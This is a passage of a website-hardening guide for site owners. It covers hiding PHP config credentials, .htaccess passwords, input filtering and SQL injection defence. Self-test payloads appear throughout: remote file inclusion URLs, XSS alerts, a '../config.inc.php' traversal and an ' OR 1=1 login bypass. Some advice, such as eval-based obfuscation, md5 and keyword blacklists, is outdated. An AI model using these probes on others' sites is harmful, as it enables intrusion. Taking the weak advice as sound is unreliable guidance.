<span style="color: #19177C">$db_username</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;loginsql&quot;</span>;
<span style="color: #19177C">$db_password</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;motdepasse&quot;</span>;
<span style="color: #BC7A00">?&gt;</span>
</pre></div>
						<p>I copy the part to be encoded between the tags &lt;?php and ?&gt;<br>
						I choose the "PHP Extrastrength" encoding. Don't look for a higher encoding, I sometimes found errors on web servers.<br>
						I copy the long line that starts with eval(xxxx between tags &lt;? and ?&gt; and paste it into the config.inc.php file, which gives:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #008000; font-weight: bold">eval</span>(<span style="color: #008000">gzuncompress</span>(<span style="color: #008000">gzinflate</span>(<span style="color: #008000">base64_decode</span>(<span style="color: #BA2121">&#39;AW4Akf942k3LTQqAIBQE4H3QHQZp5cYDRDeoRXSAMHyIkFo+K7p9f5t2w3wzSkmJ7hz6Fkw5u2AZUipVFpWZRqa0UwLQQLx5S7zOov40aE/ApyH6STP9dLsP7+LWOVoXfrZo5iMm85iP2dBTkKgv8oMsVg==&#39;</span>)))); 
<span style="color: #BC7A00">?&gt;</span>
</pre></div>
						<p>This way, you can hide all sensitive information.</p>
						<p>And assign by FTP the permissions 404 or 444 to your config.inc.php file (or equivalent) if possible.</p>
						<a id="cryptmail"></a><hr><br>
						<header>
							<h2>Encrypt your email address</h2>
						</header>
						<p>If you have no choice but to display an e-mail address on your website, you have 2 solutions:</p>
						<p><strong>1-</strong> Create an image file (svg, png, jpeg) with your address written on it. It is not text, spam robots will not see it.</p>
						<p><strong>2-</strong> Encrypt your e-mail address with javascript. I have been using this method for years and these addresses have never been spammed. Go to this website <a href="http://www.jottings.com/obfuscator/">www.jottings.com/obfuscator/</a> or <a href="https://jumk.de/nospam/stopspam.html">jumk.de/nospam/</a> to get your address encrypted.<br>
						To go even further, instead of integrating this code into your html page, we will call it from a javascript file. The advantage is that if the address is present on several pages, you only have to modify once.<br>
						Create a folder called “js” and we will put a file in it called “address.js”. Copy in this file the javascript code line of your encrypted e-mail address which starts with “var …”. For example:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">var g6=&quot;&quot;;for(var z1=0;z1&lt;335;z1++)g6+=String.fromCharCode((&quot;{fw%}&lt;B\'m3xnmya\'Bwj {tjxztrst%a\'a\'B kjwm%fA,0.a\'a\'1l4 4-jhfqujw3,?tyqnfr,aaBkjw ,ViqyVj755zaajsVnfrtistr5955zaantr,ztjxztrst%Sa\',aa,0.a\'a\'1l4V4-jhfqujw3str@5955}(+ntrCa\',aa,aaBkjwm3xnmya\'By4-jhfqujw3,Cf4AiqyS@j7}(+jsnfrSti.b5`ba\'a\'`1l4S\'@z5B\'\'@ktw-{fw%u&lt;B5@u&lt;A}&lt;3qjslym@u&lt;0B88.z50B}&lt;3xzgxyw-u&lt;188.3xuqny-\'\'.3wj{jwxj-.3otns-\'\'.@j{fq-z5.&quot;.charCodeAt(z1)-(-59+64)+24+39)%(5*2+85)+-45+77);document.write(eval(g6))</pre>
<p>Then, in your html page, copy the following code:</p>
<span class="smallfont">Code HTML:</span>
<pre class="smallfont code"><span style="color:#800000">&lt;script src=<span style="color:#0000FF">&quot;js/address.js&quot;</span> type=<span style="color:#0000FF">&quot;text/javascript&quot;</span>&gt;</span><span style="color:#800000">&lt;/script&gt;</span></pre>
						<a id="adressmail"></a><hr><br>
						<header>
							<h2>E-mail addresses to avoid</h2>
						</header>
						<p>More to do with spam than hacking, email addresses with the most common prefixes are spammed automatically (because they are more likely to exist). Therefore, avoid creating addresses with the following names:<br>
						webmaster@ admin@ contact@ email@ mail@ info@ sales@ support@ root@ www@ abuse@ news@</p>
						<p>I used contact@ and info@ without ever putting them on the web, but the amount of spam was becoming unbearable. In short, for spam as for hacking, you have to avoid intellectual laziness and default settings.</p>
						<a id="dossierpasse"></a><hr><br>
						<header>
							<h2>Protecting a folder with a password</h2>
						</header>
						<p>Apache password protection using a “.htaccess” and a “.htpasswd” file is very effective. There are several how-to guides available (for example <a href="https://httpd.apache.org/docs/2.4/en/programs/htpasswd.html">here</a>). Encrypt your password with the “bcrypt” method. The classic “crypt” and “sha-1” methods are no longer secure. You can encrypt your password with “bcrypt” online <a href="https://bcrypt-generator.com/">here</a> or <a href="https://github.com/fpirsch/twin-bcrypt">offline</a>.</p>
						<p>To do this, first create a “.htaccess” file in the directory you want to protect, and copy the code below. Note that the path to the “.htpasswd” file, the one containing the login and password, can be placed anywhere in the hosting. You don't have to put it in the same directory as “.htaccess”.</p>
<span class="smallfont">Code htaccess:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### ABSOLUTE PATH TO THE FILE “.htpasswd” </span>
<span style="color: #408080; font-style: italic">### WHICH CAN BE LOCATED IN A DIFFERENT DIRECTORY.</span>
<span style="color: #008000">AuthUserFile</span> <span style="color: #008000">/home/www/secret/.htpasswd</span>
<span style="color: #008000">AuthGroupFile</span> <span style="color: #008000">/dev/null</span>
<span style="color: #008000">AuthName</span> <span style="color: #BA2121">&quot;Protected Access&quot;</span>
<span style="color: #008000">AuthType</span> Basic
<span style="color: #008000">require</span> valid-user
</pre></div>
						<p>Then, save the “.htpasswd” file (in the directory mentioned in the “.htaccess” above). The example below shows an authorized access for the login: <em>My_Id34_Compliquated</em> and the password: <em>E@|oVfL73:r%U@tY7vT2</em> encrypted in BCrypt:</p>
<span class="smallfont">Code htpasswd:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### LOGIN AND PASSWORD ENCRYPTED IN BCRYPT </span>
<span style="color: #008000">My_Id34_Compliquated<span style="color: #000000">:</span>$2y$11$1jgFlzFxF1hHMx0fLT2l/OG5o8zxjz46r6sRwnItzBs.ZZFGLR0e6</span>
</pre></div>
						<p>However, the tutorials all forget one important point: do not name the file containing the password “.htpasswd”. This name is not mandatory, we use it by convention, not by obligation. You can call it whatever you want, for example, “.htmotdepasse” or “.machinbidule”. This custom name is declared in the “.htaccess” file. So the cracker will not find a “.htpasswd” file because it is named differently!</p>
						<p>Stop any accidental read access to the“ .htmotdepasse” file by creating an htaccess rule in the directory where it is located:</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #008000; font-weight: bold">&lt;Files</span> <span style="color: #BA2121">.htmotdepasse</span><span style="color: #008000; font-weight: bold">&gt;</span>
<span style="color: #008000">order</span> allow,deny
<span style="color: #008000">deny</span> from <span style="color: #008000; font-weight: bold">all</span>
<span style="color: #008000; font-weight: bold">&lt;/Files&gt;</span>
</pre></div>
						<p><strong>Better lock the “administration” directory:</strong><br>
						Finally, the dashboard or the administration interface of your blog, CMS or e-commerce already has a login and password protection. However, this defence is dependent on the technique used by the developer and can suffer from a security flaw. <strong>Adding a second password system with the “.htaccess” file considerably strengthens the protection to access the dashboard or the administration interface.</strong> This double authentication is not troublesome since web browser software records these passwords. Do not hesitate to use it. Of course, you will use different and complex passwords for both methods! Only brute force attacks can overcome the “.htaccess” password, so you might as well make it long and complicated. And hopefully, your web host will notice this suspicious behaviour and block the attacker in time.</p>
						<a id="robots"></a><hr><br>
						<header>
							<h2>The robots.txt file</h2>
						</header>
						<p>Do you know the role of the robots.txt file? <a href="http://www.robotstxt.org/">http://www.robotstxt.org</a> This file is used to prevent a search engine from indexing a folder or file.</p>
						<p>But do not declare in this robots.txt file a directory or file that should remain secret not only from search engines but also from hackers!!! Anyone can read the content of the robots.txt file and thus find the address of your secret folder/file.</p>
						<p>To keep a folder out of the sight of indexing robots and hackers, it is more effective to protect it with an htaccess password (see above).</p>
						<a id="protcss"></a><hr><br>
						<header>
							<h2>Protect your style.css and index.php files</h2>
						</header>
						<p>Protect by FTP your files “style.css” and “index.php” with the permissions 404 or 444. I saw a case of hacking of the style.css file where the hacker had modified this file to display a pop-up.<br>
						Protect also by FTP the file “index.php” with the rights 404 or 444 because it is by him that all the orders of your CMS, blog or e-commerce are made.</p>
						<a id="testweb"></a><hr><br>
						<header>
							<h2>How do I test the security of my website?</h2>
						</header>
						<p>Here are 3 simple methods that will allow you to check if you are using a script with big security vulnerabilities. With filtering incoming data and the advice given in this topic, you should be able to fix the problem. Otherwise, for your security, change your CMS, blog or e-commerce because the developer did not care about security.</p>
						<p>According to my logs, the next 3 attacks represent the vast majority. These vulnerabilities are so huge that hackers are looking for them first. They are like us, adept at making the slightest effort.</p>
						<p><strong class="vert">NOTE 1:</strong> <strong>none of these examples will teach you how to hack a site.</strong> It takes a lot more and it is more complicated than that. However, you will know if your script is poorly coded or not.</p>
						<p><strong class="vert">Note 2:</strong> Disable the proposed .htaccess filter rules described <a href="#htaccess">above.</a> Indeed, these rules will stop most of the attacks presented below by sending you an error <em>403 Forbidden“</em>. So, to find out if your script is fallible, disable these rules and if there is a flaw, fix the script or install a more secure one.</p>
						<p><strong>1- Attack by the execution of an external script:</strong><br>
						Create a text file containing the following code:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;Hack me if you can !!!&quot;</span>;
<span style="color: #BC7A00">?&gt;</span>
</pre></div>
						<p>Call it “pirate.txt” and make another copy called “pirate.php”. Then, by FTP, put it in the www folder on your server.</p>
						<p>In your CMS, blog or e-commerce, URLs look like this (to be adapted to your situation):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=123</pre></p>Replace “123” by “http://www.yourdomain.tld/pirate.txt” like this:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=http://www.yourdomain.tld/pirate.txt?</pre>
						<p>If you see the message “Hack me if you can!!!” appearing, then you have a huge security hole. Yes, a text file, instead of being read, was executed in php. You can do the same thing with your php file:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=http://www.yourdomain.tld/pirate.php?</pre>
						<p>We can go further. If the hacker file is at another site:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=http://www.otherwebsite.tld/pirate.txt?</pre>
						<p><strong>2- Attack by XSS or Cross Site Scripting:</strong><br>
						We use javascript to take control of your CMS, blog or e-commerce.<br>
						Your URLs look like this (to be adapted to your situation):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=123</pre>
						<p>Replace “123” by some javascript. If it is not filtered, then it is hacked. For example, if it is not filtered:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=&quot;&gt;&lt;script&gt;alert(/Hack me if you can!!!/)&lt;/script&gt;</pre>
						<p>Or another variation:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=javascript:alert(%22Hack me if you can!!!%22)</pre>
						<p>If a javascript alert window appears with the text <em>“Hack me if you can!!!”</em>, your site is open to this kind of attack.</p>
						<p><strong>3- Weakness in file downloading:</strong><br>
						This applies to 2 cases:</p>
						<p>a) You have an upload script that offers your visitors to take files. You have put all the files to download in a folder on your hosting, for example /home/loginftp/www/download/ .<br>
						Your URL looks like this (to be adapted to your situation):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/download.php?file=myfile.pdf</pre>
						<p>If we change “myfile.pdf” which is in the folder “/home/loginftp/www/download/” by “../config.inc.php” which is here “/home/loginftp/www/” like that:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/download.php?file=../config.inc.php</pre>
						<p>Are we downloading it? Do we have your SQL database login and password? Believe it or not, my download script allowed it. So anyone could take any file from my site.</p>
						<p>The same kind of behaviour can be found in the upload, which allows the hacker to save his takeover file anywhere on your hosting.</p>
						<p>b) You have a PHP script that uses the include() function to call other files. These files are called from the URL and not in the PHP code of the script. For example:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=forum.php</pre>
						<p>As above, can other files be uploaded? For example, the robots.txt file:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=robots.txt</pre>
						<p>Normally, one can't see the contents of a PHP file because its code is executed unlike the upload script in a). So this should give a blank page, but check it anyway:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=config.inc.php</pre>
						<p>Hopefully, with some hosting providers the PHP include() function does not allow you to open a file outside your hosting (for security reasons). But this should be possible on other less secure servers:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">http://www.yourdomain.tld/?page=http://www.otherwebsite.tld</pre>
						<a id="filtrephp"></a><hr><br>
						<header>
							<h2>Securing a PHP script</h2>
						</header>
						<p>An explanation of security with PHP is here: <a href="http://phpsec.org/projects/guide/">http://phpsec.org/projects/guide/</a></p>
						<p>Then, if you use a small script in PHP that processes data from a form or variable in a URL such as “/?page=23&amp;id=thing” (so using GET or POST queries), these data must be filtered to avoid any flaws.</p>
						<p>I use this piece of code that I put at the head of the script in order to filter all the data coming in:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #19177C">$_REQUEST</span> <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$key</span> <span style="color: #666666">=&gt;</span> <span style="color: #19177C">$val</span>) 
{
  <span style="color: #19177C">$val</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;/[^_A-Za-z0-9-\.&amp;=]/i&quot;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$val</span>);
  <span style="color: #19177C">$_REQUEST</span>[<span style="color: #19177C">$key</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$val</span>;
}
</pre></div>
						<p>Thus, only alphanumeric characters and the signs _ . &amp; = are allowed.<br>
All other characters are deleted.</p>
						<p>There is another filter if the one shown above is too restrictive:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #19177C">$_REQUEST</span> <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$key</span> <span style="color: #666666">=&gt;</span> <span style="color: #19177C">$val</span>) 
{
  <span style="color: #19177C">$val</span> <span style="color: #666666">=</span> trim(<span style="color: #008000">stripslashes</span>(<span style="color: #008000">htmlentities</span>(<span style="color: #19177C">$val</span>)));
  <span style="color: #19177C">$_REQUEST</span>[<span style="color: #19177C">$key</span>] <span style="color: #666666">=</span> <span style="color: #19177C">$val</span>;
}  
</pre></div>
						<p>To protect a specific variable sent by form, you can choose one of the two filters below (do not use both filters for the same variable):</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">/* for basic filtering */</span>
<span style="color: #19177C">$variable</span> <span style="color: #666666">=</span> trim(<span style="color: #008000">stripslashes</span>(<span style="color: #008000">htmlentities</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;variable&quot;</span>])));

<span style="color: #408080; font-style: italic">/* for a more restrictive filtering */</span>
<span style="color: #19177C">$variable</span> <span style="color: #666666">=</span> <span style="color: #008000">preg_replace</span>(<span style="color: #BA2121">&quot;/[^_A-Za-z0-9-\.&amp;=]/i&quot;</span>,<span style="color: #BA2121">&#39;&#39;</span>, <span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;variable&quot;</span>]);
</pre></div>
						<p>This is a general protection that works against the simplest forms of hacking.<br>
						Put this code only if there is no filtering system.</p>
						<p>Starting with PHP 5.2, there is a series of filters that allow the filtering of data: <a href="https://www.php.net/filter">https://www.php.net/filter</a>.</p>
						<a id="filtreperl"></a><hr><br>
						<header>
							<h2>Securing a PERL script</h2>
						</header>
						<p>it is like the previous article on php. If you use a small script in PERL that processes data from a form or variable in a URL such as “/index.cgi?page=23&amp;id=thing” (so using GET or POST queries), these data must be filtered to avoid any vulnerabilities.</p>
						<p>I use this piece of code that I put at the head of the script in order to filter all the data that comes in:</p>
<span class="smallfont">Code Perl:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #19177C">$val</span> <span style="color: #666666">=</span> <span style="color: #19177C">$ENV</span>{<span style="color: #BA2121">&#39;QUERY_STRING&#39;</span>};
<span style="color: #19177C">$val</span> <span style="color: #666666">=~</span> <span style="color: #BB6688">s/%([a-fA-F0-9][a-fA-F0-9])/pack(&quot;C&quot;, hex($1))/eg</span>;
<span style="color: #19177C">$val</span> <span style="color: #666666">=~</span> <span style="color: #BB6688">s/&lt;([^&gt;]|\n)*&gt;//g</span>;
<span style="color: #19177C">$val</span> <span style="color: #666666">=~</span> <span style="color: #BB6688">s/([&lt;&gt;\&amp;\$;:\`\|\&quot;\&#39;*\?\!\~\^\(\)\[\]\{\}]|\\|\.\.|^\/)//g</span>;
</pre></div>
						<p>First, we decode the non-alphanumeric characters that are url-encoded. Then, we erase the characters that can cause problems such as html tags and some characters in the 4th line of the above code.<br>
						This is a general protection that works against the simplest forms of hacking.</p>
						<p>Insert this code only if there is no filtering system.</p>
						<a id="injectsql"></a><hr><br>
						<header>
							<h2>Countering SQL injections</h2>
						</header>
						<p>This attack targets web servers by looking for coding errors in ASP, CGI and PHP scripts, the same scripts that execute SQL queries. If you don't code, don't bother, this is a reminder to developers.</p>
						<p><strong>What is an SQL injection attack?</strong></p>
						<p>SQL (Structured Query Language) is a database language used by many CMS, blog, wiki, Gallery, etc. It is a query-based language using statements such as INSERT (to insert data into the database), DELETE (to remove data), UPDATE (to update data), SELECT (to select and read data), and many others. But this simplicity also makes it an easy prey to vulnerability detection.</p>
						<p><em>Sample query:</em></p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">mysql_query(&quot;SELECT * FROM users WHERE login = 'toto';&quot;);</pre>
						<p>This query selects the user (extracted from the “users” table) whose login is “toto”. “SELECT *” means that all the fields of this table are selected. The example below is an SQL injection type attack in order to retrieve a password, it is the most common attack. My page contains a classic user identification form where you enter a username and a password. The query associated with this form to verify that the login / password entered are valid against our database would be:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">mysql_query(&quot;SELECT * FROM users WHERE utilisateur = '$login' AND motdepasse = '$password'&quot;);</pre>
<p>This query would select the particular user if the username AND password entered are in our database. If one of the two is incorrect, the query will not return any results.</p>
						<p><em>The particular attack</em></p>
						<p>Knowing that in my example the variable $login contains what I typed in my first text field and the variable $password contains what I typed in the second text field (the password), this is what will happen if I enter the following code in the first login field: ' OR 1=1&quot;); // , the query is:</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">mysql_query(&quot;SELECT * FROM users WHERE utilisateur = '' OR 1=1&quot;); //' AND motdepasse = '$password'&quot;);</pre>
						<p>And it would certainly identify the user successfully because the query is true if a user '' exists OR if 1=1. Since the user <em>empty</em> does not exist, but 1 is equal to 1, then the query is true and valid. So, by adding this code, we force to believe that any query is true. The “//” sign means a comment in PHP, the rest of the code is not interpreted, it is rendered useless. And here you are with a database access! This is the simplest example, many others allow you to really take control of a server by pretending to be root or the administrator. The possibilities are unfortunately numerous. We will not develop them.</p>
						<p><strong>How to protect against SQL injection attacks?</strong></p>
						<p>To prevent these attacks, you need to know how to write code. If it is well done, attacks are no longer possible. Here are some tips:<br>
						Avoid using an account with full authority to run your SQL server.<br>
						Delete the functions you don't use such as master..xp_cmdshell, and in general all those beginning with “master..xp”.<br>
						Check user entries such as text fields. Also check that the expected numbers are numbers with a function such as IsNumeric() for example.<br>
						Also make sure to filter the parameters of URLs that are manually added.<br>
						Use escape characters and functions such as AddStripSlashes() in PHP, see the function specifications and, in general, the documentation for your programming languages for more information. This will prevent user input of the ' character by escaping it with a slash before it.<br>
						Generally prevent some user input sequences such as “;”, “insert”, “select”, “//”, “--”, etc.<br>
						Limit the number of characters that a user can enter in a text field, as this may well make it more difficult for them to do so.<br>
						Be careful what you put in the cookies because a password (even encrypted in md5) is quickly found by an attack of this type. Afterwards, a replacement of this value in the cookie saves the attacker from a brute force attack, so it is a nice gift.</p>
						<p><strong>Practical application</strong></p>
						<p>The simplest method is to filter all variables by applying php filters like this:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">/* for basic filtering */</span>
<span style="color: #19177C">$variable</span> <span style="color: #666666">=</span> <span style="color: #008000">mysql_real_escape_string</span>(<span style="color: #008000">htmlspecialchars</span>(<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&quot;variable&quot;</span>]));
</pre></div>
<p>Here is a small script to avoid SQL injections in an identification form (login and password) to be adapted according to your forms:</p>
<span class="smallfont">Code PHP:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #BC7A00">&lt;?php</span>
<span style="color: #008000; font-weight: bold">function</span> <span style="color: #0000FF">anti_injection</span>( <span style="color: #19177C">$user</span>, <span style="color: #19177C">$pass</span> ) {
<span style="color: #408080; font-style: italic"># see if there are any SQL commands.</span>
    <span style="color: #19177C">$banlist</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">array</span> (
        <span style="color: #BA2121">&quot;insert&quot;</span>, <span style="color: #BA2121">&quot;select&quot;</span>, <span style="color: #BA2121">&quot;update&quot;</span>, <span style="color: #BA2121">&quot;delete&quot;</span>, <span style="color: #BA2121">&quot;distinct&quot;</span>, <span style="color: #BA2121">&quot;having&quot;</span>, <span style="color: #BA2121">&quot;truncate&quot;</span>,
        <span style="color: #BA2121">&quot;replace&quot;</span>, <span style="color: #BA2121">&quot;handler&quot;</span>, <span style="color: #BA2121">&quot;like&quot;</span>, <span style="color: #BA2121">&quot;procedure&quot;</span>, <span style="color: #BA2121">&quot;limit&quot;</span>, <span style="color: #BA2121">&quot;order by&quot;</span>, <span style="color: #BA2121">&quot;group by&quot;</span> 
        );
    <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #008000">eregi</span> ( <span style="color: #BA2121">&quot;[a-zA-Z0-9]+&quot;</span>, <span style="color: #19177C">$user</span> ) ) {
        <span style="color: #19177C">$user</span> <span style="color: #666666">=</span> trim ( <span style="color: #008000">str_replace</span> ( <span style="color: #19177C">$banlist</span>, <span style="color: #BA2121">&#39;&#39;</span>, strtolower ( <span style="color: #19177C">$user</span> ) ) );
    } <span style="color: #008000; font-weight: bold">else</span> {
        <span style="color: #19177C">$user</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">NULL</span>;
    }

    <span style="color: #408080; font-style: italic"># see if the password is alphanumeric.</span>
    <span style="color: #408080; font-style: italic"># we use strtolower() to run str_ireplace()</span>
    <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #008000">eregi</span> ( <span style="color: #BA2121">&quot;[a-zA-Z0-9]+&quot;</span>, <span style="color: #19177C">$pass</span> ) ) {
        <span style="color: #19177C">$pass</span> <span style="color: #666666">=</span> trim ( <span style="color: #008000">str_replace</span> ( <span style="color: #19177C">$banlist</span>, <span style="color: #BA2121">&#39;&#39;</span>, strtolower ( <span style="color: #19177C">$pass</span> ) ) );
    } <span style="color: #008000; font-weight: bold">else</span> {
        <span style="color: #19177C">$pass</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">NULL</span>;
    }

    <span style="color: #408080; font-style: italic"># we make a table</span>
    <span style="color: #408080; font-style: italic"># If there's any illegal characters, we are shutting it down.</span>
    <span style="color: #19177C">$array</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">array</span> ( <span style="color: #BA2121">&#39;user&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #19177C">$user</span>, <span style="color: #BA2121">&#39;pass&#39;</span> <span style="color: #666666">=&gt;</span> <span style="color: #19177C">$pass</span> );
    <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #008000">in_array</span> ( <span style="color: #008000; font-weight: bold">NULL</span>, <span style="color: #19177C">$array</span> ) ) {
        <span style="color: #008000; font-weight: bold">die</span> ( <span style="color: #BA2121">&#39;ERROR: SQL injection detected&#39;</span> );
    } <span style="color: #008000; font-weight: bold">else</span> {
        <span style="color: #008000; font-weight: bold">return</span> <span style="color: #19177C">$array</span>;
    }
} <span style="color: #408080; font-style: italic">// ##########</span>
<span style="color: #19177C">$login</span> <span style="color: #666666">=</span> anti_injection (<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;pseudo&#39;</span>],<span style="color: #19177C">$_POST</span>[<span style="color: #BA2121">&#39;pass&#39;</span>]); <span style="color: #408080; font-style: italic">// the anti-injection function is activated</span>
<span style="color: #19177C">$password</span> <span style="color: #666666">=</span> <span style="color: #19177C">$login</span>[<span style="color: #BA2121">&#39;pass&#39;</span>]; <span style="color: #408080; font-style: italic">// we get the pass</span>
<span style="color: #19177C">$password</span><span style="color: #666666">=</span><span style="color: #008000">md5</span>(<span style="color: #19177C">$password</span>); <span style="color: #408080; font-style: italic">// we put the pass in md5</span>
<span style="color: #19177C">$pseudo</span> <span style="color: #666666">=</span> <span style="color: #19177C">$login</span>[<span style="color: #BA2121">&#39;user&#39;</span>]; <span style="color: #408080; font-style: italic">// we get the nickname</span>
<span style="color: #BC7A00">?&gt;</span> 
</pre></div>
						<a id="piratesavoir"></a><hr><br>
						<header>
							<h2>Were you unknowingly hacked?</h2>
						</header>
						<p>You have a CMS, blog or e-commerce? You may have been unknowingly hacked by hackers who want to put links to their websites in order to artificially increase their Pagerank.<br>
						Careful, this is very serious. it is an invisible, almost benign, but very real hack. If you find the elements described below, your CMS, blog or e-commerce has been hacked by professionals paid for it, not by kids who have fun deleting sites by inserting their pseudonyms instead. <br>
						Login to your phpMyadmin.<br>
						Once identified, in the top left-hand column, click on the name of your database, then in the main window, at the top click on the Search tab.<br>
						Then enter one of the 3 sentences: <br>
						%display:none%<br>
						%height:0%<br>
						%visibility:hidden%</p>
						<p>If you find entries in the texts of your pages or comments containing “display:none” or “height:0” or “visibility:hidden”, so you were hacked. These web links to the hackers' sites are invisible but present in the code and visible by the indexing robots. Delete these links, change your password, update your software and follow the advice in this article.</p>
						<p>And if you notice a strange behaviour of your CMS, blog or e-commerce, take the opportunity to check that there are no new files or folders added or modified recently by installing <a href="#fichmodif">the script described here.</a> It may be your CMS, blog or e-commerce that did this, but it is better to be sure.</p>
					</section>
				</div>
			</div>
			<div class="4u 12u(narrower)">

				<!-- Sidebar -->
				<div class="sidebar" role="complementary">
					<section>
						<header>
							<h2><span class="icon fa-talk fa-lg"></span> Comment</h2>
						</header>
						<p>You can fight against hackers and protect your website by following these simple tips. They are effective enough to defend against automatic attacks and will give work to those who specifically aim to penetrate your site for various reasons.</p>
						<p>Take these tips as a <strong>list of good practices</strong> that a professional should apply at the very least. Here, you will only get recommendations on how to host a website for the client and the web-developer. You will not learn how to protect a web server as a system administrator must do because this is part of his training.</p>
						<p>The idea behind this comprehensive list of tips is that the threat must be taken seriously. It is like a burglary, you first take preventive measures to avoid the risks. We know that breaking and entering are always possible for those who have sufficient means and time. Now, what deters a burglar is precisely the time and effort he will have to spend breaking in. If it is too long and complicated, he'll get away with it. So we will put a full range of locks on the website to combat this kind of attack.</p>
					</section>
					<section>
						<header>
							<h2><span class="icon fa-users fa-lg"></span> Share</h2>
						</header>
						<ul class="icons center">
							<li><a href="#dmodale" id="omodale" class="icon circle fa-partage-alt"><span class="label">Lien</span></a></li>
							<li><a href="mailto:?subject=Check%20out%20this%20article%20from%20the%20Silomia%20website.&body=I%20just%20read%20this%20article%20from%20the%20Silomia%20website%20and%20I%20think%20you%20will%20find%20it%20interesting.%20%20%0D%0Go%20to%20this%20address%3A%20https%3A%2F%2Fsilomia.github.io%2Fen-internet-secure-protect-from-hacker-attacks.html" class="icon circle fa-envelope"><span class="label">E-mail</span></a></li>
						</ul>
						<ul class="icons center">
							<li><a href="internet-se-proteger-des-pirates-et-hackers.html" class="icon circle fa-language"><span class="label">Lien</span></a> <br><a class="smallfont" href="internet-se-proteger-des-pirates-et-hackers.html">Version française</a></li>
						</ul>
						<dialog id="dmodale">
							<header class="tmodale"><p>Copy the link to share it</p></header>
							<p class="smallfont"><a id="lmodale" href="https://silomia.github.io/en-internet-secure-protect-from-hacker-attacks.html">https://silomia.github.io/en-internet-secure-protect-from-hacker-attacks.html</a></p>
							<footer class="tmodale smallfont"><button id="cmodale" class="button">Close</button> <button id="copier" data-copie=">> Link copied" class="button special">Copy</button></footer>
						</dialog>
					</section>
				</div>
			</div>
		</div>
	</section>

	<!-- Two -->
	<section class="wrapper style1 container special">
		<div class="row">
